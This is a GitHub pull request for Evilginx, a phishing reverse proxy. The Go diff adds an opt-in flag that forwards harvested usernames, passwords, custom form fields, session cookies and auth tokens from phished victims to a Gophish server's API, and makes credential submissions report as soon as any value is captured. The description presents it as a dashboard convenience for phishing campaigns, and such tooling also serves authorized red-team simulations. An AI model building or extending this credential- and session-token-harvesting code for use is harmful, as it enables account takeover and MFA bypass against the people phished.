### PR TITLE
Added config flag to send captured credentials to Gophish

### DIFF
--- a/core/config.go
+++ b/core/config.go
@@ -62,6 +62,7 @@ type CertificatesConfig struct {
 type GoPhishConfig struct {
 	AdminUrl    string `mapstructure:"admin_url" json:"admin_url" yaml:"admin_url"`
 	ApiKey      string `mapstructure:"api_key" json:"api_key" yaml:"api_key"`
+	Sessions      bool `mapstructure:"sessions" json:"sessions" yaml:"sessions"`
 	InsecureTLS bool   `mapstructure:"insecure" json:"insecure" yaml:"insecure"`
 }
 
@@ -377,6 +378,13 @@ func (c *Config) SetGoPhishInsecureTLS(k bool) {
 	c.gophishConfig.InsecureTLS = k
 	c.cfg.Set(CFG_GOPHISH, c.gophishConfig)
 	log.Info("gophish insecure set to: %v", k)
+	c.cfg.WriteConfig()
+}
+
+func (c *Config) SetGoPhishSessions(k bool) {
+	c.gophishConfig.Sessions = k
+	c.cfg.Set(CFG_GOPHISH, c.gophishConfig)
+	log.Info("gophish sessions set to: %v", k)
 	c.cfg.WriteConfig()
 }
 
@@ -822,4 +830,8 @@ func (c *Config) GetGoPhishApiKey() string {
 
 func (c *Config) GetGoPhishInsecureTLS() bool {
 	return c.gophishConfig.InsecureTLS
+}
+
+func (c *Config) GetGoPhishSessions() bool {
+	return c.gophishConfig.Sessions
 }

--- a/core/gophish.go
+++ b/core/gophish.go
@@ -104,14 +104,52 @@ func (o *GoPhish) ReportCredentialsSubmitted(rid string, session *Session, gophi
 
 	data := make(map[string]interface{})
 	if gophishSessions {
-		data["username"] = session.Username
-		data["password"] = session.Password
-		if len(session.CookieTokens) != 0 {
-			data["cookies"] = (*Terminal).cookieTokensToJSON(nil, session.CookieTokens)
+		if session.Username != "" {
+			data["username"] = session.Username
 		}
-
+		if session.Password != "" {
+			data["password"] = session.Password
+		}
 		for k, v := range session.Custom {
 			data[k] = v
+		}
+	}
+
+	req := ResultRequest{
+		Address:   session.RemoteAddr,
+		UserAgent: session.UserAgent,
+		Data:      data,
+	}
+
+	content, err := json.Marshal(req)
+	if err != nil {
+		return err
+	}
+
+	var reqUrl url.URL = *o.AdminUrl
+	reqUrl.Path = fmt.Sprintf("/api/results/%s/submit", rid)
+	return o.apiRequest(reqUrl.String(), content)
+}
+
+func (o *GoPhish) ReportCapturedSession(rid string, session *Session, gophishSessions bool) error {
+	err := o.validateSetup()
+	if err != nil {
+		return err
+	}
+
+	data := make(map[string]interface{})
+	if gophishSessions {
+		if session.Username != "" {
+			data["username"] = session.Username
+		}
+		if session.Password != "" {
+			data["password"] = session.Password
+		}
+		for k, v := range session.Custom {
+			data[k] = v
+		}
+		if len(session.CookieTokens) != 0 {
+			data["cookies"] = (*Terminal).cookieTokensToJSON(nil, session.CookieTokens)
 		}
 		for k, v := range session.BodyTokens {
 			data[k] = v
@@ -133,7 +171,7 @@ func (o *GoPhish) ReportCredentialsSubmitted(rid string, session *Session, gophi
 	}
 
 	var reqUrl url.URL = *o.AdminUrl
-	reqUrl.Path = fmt.Sprintf("/api/results/%s/submit", rid)
+	reqUrl.Path = fmt.Sprintf("/api/results/%s/session", rid)
 	return o.apiRequest(reqUrl.String(), content)
 }
 

--- a/core/http_proxy.go
+++ b/core/http_proxy.go
@@ -384,7 +384,7 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 												rid, ok := session.Params["rid"]
 												if ok && rid != "" {
 													log.Info("[gophish] [%s] email opened: %s (%s)", hiblue.Sprint(pl_name), req.Header.Get("User-Agent"), remote_addr)
-													p.gophish.Setup(p.cfg.GetGoPhishAdminUrl(), p.cfg.GetGoPhishApiKey(), p.cfg.GetGoPhishInsecureTLS())
+													p.gophish.Setup(p.cfg.GetGoPhishAdminUrl(), p.cfg.GetGoPhishApiKey(), p.cfg.GetGoPhishInsecureTLS(), p.cfg.GetGoPhishSessions())
 													err = p.gophish.ReportEmailOpened(rid, remote_addr, req.Header.Get("User-Agent"))
 													if err != nil {
 														log.Error("gophish: %s", err)
@@ -405,7 +405,7 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 									if p.cfg.GetGoPhishAdminUrl() != "" && p.cfg.GetGoPhishApiKey() != "" {
 										rid, ok := session.Params["rid"]
 										if ok && rid != "" {
-											p.gophish.Setup(p.cfg.GetGoPhishAdminUrl(), p.cfg.GetGoPhishApiKey(), p.cfg.GetGoPhishInsecureTLS())
+											p.gophish.Setup(p.cfg.GetGoPhishAdminUrl(), p.cfg.GetGoPhishApiKey(), p.cfg.GetGoPhishInsecureTLS(), p.cfg.GetGoPhishSessions())
 											err = p.gophish.ReportEmailLinkClicked(rid, remote_addr, req.Header.Get("User-Agent"))
 											if err != nil {
 												log.Error("gophish: %s", err)
@@ -1065,8 +1065,8 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 						if p.cfg.GetGoPhishAdminUrl() != "" && p.cfg.GetGoPhishApiKey() != "" {
 							rid, ok := s.Params["rid"]
 							if ok && rid != "" {
-								p.gophish.Setup(p.cfg.GetGoPhishAdminUrl(), p.cfg.GetGoPhishApiKey(), p.cfg.GetGoPhishInsecureTLS())
-								err = p.gophish.ReportCredentialsSubmitted(rid, s.RemoteAddr, s.UserAgent)
+								p.gophish.Setup(p.cfg.GetGoPhishAdminUrl(), p.cfg.GetGoPhishApiKey(), p.cfg.GetGoPhishInsecureTLS(), p.cfg.GetGoPhishSessions())
+								err = p.gophish.ReportCredentialsSubmitted(rid, s, p.cfg.GetGoPhishSessions())
 								if err != nil {
 									log.Error("gophish: %s", err)
 								}
@@ -1205,8 +1205,8 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 							if p.cfg.GetGoPhishAdminUrl() != "" && p.cfg.GetGoPhishApiKey() != "" {
 								rid, ok := s.Params["rid"]
 								if ok && rid != "" {
-									p.gophish.Setup(p.cfg.GetGoPhishAdminUrl(), p.cfg.GetGoPhishApiKey(), p.cfg.GetGoPhishInsecureTLS())
-									err = p.gophish.ReportCredentialsSubmitted(rid, s.RemoteAddr, s.UserAgent)
+									p.gophish.Setup(p.cfg.GetGoPhishAdminUrl(), p.cfg.GetGoPhishApiKey(), p.cfg.GetGoPhishInsecureTLS(), p.cfg.GetGoPhishSessions())
+									err = p.gophish.ReportCredentialsSubmitted(rid, s, p.cfg.GetGoPhishSessions())
 									if err != nil {
 										log.Error("gophish: %s", err)
 									}

--- a/core/http_proxy.go
+++ b/core/http_proxy.go
@@ -674,6 +674,7 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 						form_re := regexp.MustCompile("application\\/x-www-form-urlencoded")
 
 						if json_re.MatchString(contentType) {
+							captured:= false
 
 							if pl.username.tp == "json" {
 								um := pl.username.search.FindStringSubmatch(string(body))
@@ -683,6 +684,7 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 									if err := p.db.SetSessionUsername(ps.SessionId, um[1]); err != nil {
 										log.Error("database: %v", err)
 									}
+									captured = true
 								}
 							}
 
@@ -694,6 +696,7 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 									if err := p.db.SetSessionPassword(ps.SessionId, pm[1]); err != nil {
 										log.Error("database: %v", err)
 									}
+									captured = true
 								}
 							}
 
@@ -706,8 +709,12 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 										if err := p.db.SetSessionCustom(ps.SessionId, cp.key_s, cm[1]); err != nil {
 											log.Error("database: %v", err)
 										}
+										captured = true
 									}
 								}
+							}
+							if captured {
+								p.ReportCredentialsSubmitted(ps.SessionId)
 							}
 
 							// force post json
@@ -753,6 +760,7 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 
 							if req.ParseForm() == nil && req.PostForm != nil && len(req.PostForm) > 0 {
 								log.Debug("POST: %s", req.URL.Path)
+								captured:= false
 
 								for k, v := range req.PostForm {
 									// patch phishing URLs in POST params with original domains
@@ -765,6 +773,7 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 											if err := p.db.SetSessionUsername(ps.SessionId, um[1]); err != nil {
 												log.Error("database: %v", err)
 											}
+											captured = true
 										}
 									}
 									if pl.password.key != nil && pl.password.search != nil && pl.password.key.MatchString(k) {
@@ -775,6 +784,7 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 											if err := p.db.SetSessionPassword(ps.SessionId, pm[1]); err != nil {
 												log.Error("database: %v", err)
 											}
+											captured = true
 										}
 									}
 									for _, cp := range pl.custom {
@@ -786,9 +796,13 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 												if err := p.db.SetSessionCustom(ps.SessionId, cp.key_s, cm[1]); err != nil {
 													log.Error("database: %v", err)
 												}
+												captured = true
 											}
 										}
 									}
+								}
+								if captured {
+									p.ReportCredentialsSubmitted(ps.SessionId)
 								}
 
 								for k, v := range req.PostForm {
@@ -1062,16 +1076,7 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 						}
 						s.Finish(false)
 
-						if p.cfg.GetGoPhishAdminUrl() != "" && p.cfg.GetGoPhishApiKey() != "" {
-							rid, ok := s.Params["rid"]
-							if ok && rid != "" {
-								p.gophish.Setup(p.cfg.GetGoPhishAdminUrl(), p.cfg.GetGoPhishApiKey(), p.cfg.GetGoPhishInsecureTLS(), p.cfg.GetGoPhishSessions())
-								err = p.gophish.ReportCredentialsSubmitted(rid, s, p.cfg.GetGoPhishSessions())
-								if err != nil {
-									log.Error("gophish: %s", err)
-								}
-							}
-						}
+						p.ReportCapturedSession(ps.SessionId)
 					}
 				}
 			}
@@ -1202,16 +1207,7 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 								log.Success("[%d] detected authorization URL - tokens intercepted: %s", ps.Index, resp.Request.URL.Path)
 							}
 
-							if p.cfg.GetGoPhishAdminUrl() != "" && p.cfg.GetGoPhishApiKey() != "" {
-								rid, ok := s.Params["rid"]
-								if ok && rid != "" {
-									p.gophish.Setup(p.cfg.GetGoPhishAdminUrl(), p.cfg.GetGoPhishApiKey(), p.cfg.GetGoPhishInsecureTLS(), p.cfg.GetGoPhishSessions())
-									err = p.gophish.ReportCredentialsSubmitted(rid, s, p.cfg.GetGoPhishSessions())
-									if err != nil {
-										log.Error("gophish: %s", err)
-									}
-								}
-							}
+							p.ReportCapturedSession(ps.SessionId)
 							break
 						}
 					}
@@ -1595,6 +1591,36 @@ func (p *HttpProxy) setSessionCustom(sid string, name string, value string) {
 	s, ok := p.sessions[sid]
 	if ok {
 		s.SetCustom(name, value)
+	}
+}
+
+func (p *HttpProxy) ReportCredentialsSubmitted(session string) {
+	if s, ok := p.sessions[session]; ok {
+		if p.cfg.GetGoPhishAdminUrl() != "" && p.cfg.GetGoPhishApiKey() != "" {
+			rid, ok := s.Params["rid"]
+			if ok && rid != "" {
+				p.gophish.Setup(p.cfg.GetGoPhishAdminUrl(), p.cfg.GetGoPhishApiKey(), p.cfg.GetGoPhishInsecureTLS(), p.cfg.GetGoPhishSessions())
+				err := p.gophish.ReportCredentialsSubmitted(rid, s, p.cfg.GetGoPhishSessions())
+				if err != nil {
+					log.Error("gophish: %s", err)
+				}
+			}
+		}
+	}
+}
+
+func (p *HttpProxy) ReportCapturedSession(session string) {
+	if s, ok := p.sessions[session]; ok {
+		if p.cfg.GetGoPhishAdminUrl() != "" && p.cfg.GetGoPhishApiKey() != "" {
+			rid, ok := s.Params["rid"]
+			if ok && rid != "" {
+				p.gophish.Setup(p.cfg.GetGoPhishAdminUrl(), p.cfg.GetGoPhishApiKey(), p.cfg.GetGoPhishInsecureTLS(), p.cfg.GetGoPhishSessions())
+				err := p.gophish.ReportCapturedSession(rid, s, p.cfg.GetGoPhishSessions())
+				if err != nil {
+					log.Error("gophish: %s", err)
+				}
+			}
+		}
 	}
 }
 


### PR DESCRIPTION
Hello there,

By default, Evilginx does not send session information to Gophish. This is on purpose not to expose credentials and keep them in Evilginx only. Nevertheless, having credentials readily available in Gophish could be a nice feature to have everything in the dashboard, provided Gophish's admin interface is properly secured (behind a firewall for instance). I made it an opt-in feature to keep the default behavior.

Default behavior (or after `config gophish sessions false` in Evilginx' terminal):

![Capture d’écran 2024-10-25 à 20 36 42](https://github.com/user-attachments/assets/ab1fdd19-418f-4f58-bfb0-cc011240e616)

After `config gophish sessions true` in Evilginx' terminal:

![Capture d’écran 2024-10-25 à 20 38 22](https://github.com/user-attachments/assets/53e6a116-9ac5-482e-aeb4-9f056c35392d)

The feature takes into account all three types of credentials (username, password and custom) and all three types of auth_tokens (cookies, body and HTTP tokens).

**NB**: Actually displaying session info in Gophish requires the ability for Gophish to receive session information (see https://github.com/kgretzky/gophish/pull/1). The Gophish update was done by @nairpaa, who also did a similar update for Evilginx but without the opt-in and not supporting cookie tokens. I merged his changes with mine as he wrapped the session info into a single generic `data` member, which is cleaner on the wire (instead of having potentially null members, unrelated to the event being sent by Evilginx).